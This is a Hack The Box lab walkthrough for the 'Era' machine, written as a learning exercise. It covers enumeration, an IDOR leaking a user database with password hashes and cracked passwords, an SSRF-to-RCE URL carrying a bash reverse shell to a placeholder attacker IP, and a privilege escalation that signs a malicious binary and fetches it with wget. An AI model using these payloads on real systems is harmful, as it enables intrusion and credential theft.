# Era HTB – Pentest Walkthrough

**Target:** Linux Machine  

---

## Reconnaissance

Performed an initial Nmap scan to identify open ports and services:

```bash
nmap -sC -sV <IP_ADDRESS>

Findings:

    21/tcp – FTP (vsftpd 3.0.5)

    80/tcp – HTTP (nginx 1.18.0, Ubuntu)

Accessed the web service on port 80 and identified a domain era.htb.
Added it to /etc/hosts for easier access.
The landing page contained nothing interesting after initial enumeration.
Enumeration
Directory & Subdomain Discovery

Used gobuster and ffuf:

    Found subdomain: file.era.htb

Navigated to file.era.htb → Era Storage landing page with features:

    Manage Files

    Upload Files

    Update Security Questions

    Sign In

Ran Gobuster against file.era.htb:

/download.php         (302 redirect to login.php)
/images               (301)
/login.php            (200)
/register.php         (200)
/files                (301)
/assets               (301)
/upload.php           (302 redirect to login.php)
/layout.php           (200)
/logout.php           (200)
/manage.php           (302 redirect to login.php)
/LICENSE              (200)
/reset.php            (302 redirect to login.php)

Registration & IDOR Discovery

    Registered a user at /register.php.

    Logged in, found Manage Files with file deletion time setting.

    Upload feature revealed an IDOR in the id parameter.

Using Burp Intruder → Found valid IDs: 54, 150.
Extracted Sensitive Data

Downloaded and unzipped files from IDs:

sqlite.db User Table:

INSERT INTO users VALUES(1,'admin_ef01cab31aa','$2y$10$wDbohsUaezf74d3sMNRPi.o93wDxJqphM2m0VVUp41If6WrYr.QPC',600,'Maria','Oliver','Ottawa');
INSERT INTO users VALUES(2,'eric','$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm',-1,NULL,NULL,NULL);
INSERT INTO users VALUES(3,'veronica','$2y$10$xQmS7JL8UT4B3jAYK7jsNeZ4I.YqaFFnZNA/2GCxLveQ805kuQGOK',-1,NULL,NULL,NULL);
INSERT INTO users VALUES(4,'yuri','$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.',-1,NULL,NULL,NULL);
INSERT INTO users VALUES(5,'john','$2a$10$iccCEz6.5.W2p7CSBOr3ReaOqyNmINMH1LaqeQaL22a1T1V/IddE6',-1,NULL,NULL,NULL);
INSERT INTO users VALUES(6,'ethan','$2a$10$PkV/LAd07ftxVzBHhrpgcOwD3G1omX4Dk2Y56Tv9DpuUV/dh/a1

Cracked Credentials:

    eric:america

    yuri:mustang

SSRF to RCE

Second archive contained vulnerable PHP code in download.php enabling SSRF via ssh2.exec://.

Steps:

    Changed admin’s security questions via account panel.

    Logged in as admin.

    Crafted an exploit URL:

http://file.era.htb/download.php?id=54&show=true&format=ssh2.exec://yuri:mustang@127.0.0.1/bash%20-c%20"bash%20-i%20>%26%20/dev/tcp/<YOUR_IP>/4444%200>%261"

    Gained ssh as yuri.

    Switched to eric using cracked credentials (su eric) and retrieved user.txt.

Privilege Escalation

    Found binary: /opt/AV/periodic-checks/monitor.

    Exploited binary signing process using leaked signing key.

Compile Exploit

x86_64-linux-gnu-gcc -o monitor exploit.c -static

Build Signer

git clone https://github.com/NUAA-WatchDog/linux-elf-binary-signer.git
cd linux-elf-binary-signer
make clean
gcc -o elf-sign elf_sign.c -lssl -lcrypto -Wno-deprecated-declarations

Sign Exploit

./elf-sign sha256 key.pem key.pem monitor
mv monitor monitor.1

Transfer & Execute

# On attacker machine
python3 -m http.server 8000

# On target
wget http://<YOUR_IP>:8000/monitor.1
rm monitor
mv monitor.1 monitor
chmod +x monitor

# Execution
./monitor

Root shell obtained. Retrieved /root/root.txt.
Key Takeaways

    First Hands-On with LinPEAS:
This was my first real experience using LinPEAS for privilege escalation. 
The tool’s color-coded output made it easy to identify potential attack vectors quickly and was a huge help in organizing my findings.

SSRF to RCE Chain:
Exploiting the SSRF vulnerability to gain RCE was a great exercise in chaining vulnerabilities together. 
I’m getting more confident at spotting opportunities to combine smaller issues into a bigger compromise path.

Binary Signing Abuse:
This step was challenging because I wasn’t familiar with binary signing and how to weaponize it. 
It forced me to slow down, research, and learn something new—which is always a win. Google and documentation were lifesavers here.

Manual Testing vs. Automation:
Manual enumeration and testing were absolutely critical in compromising this box. 
While automated tools like BurpSuite or scanners are great for coverage, they won’t always catch subtle or creative attack vectors. 
This engagement reinforced that manual testing should always complement automation.
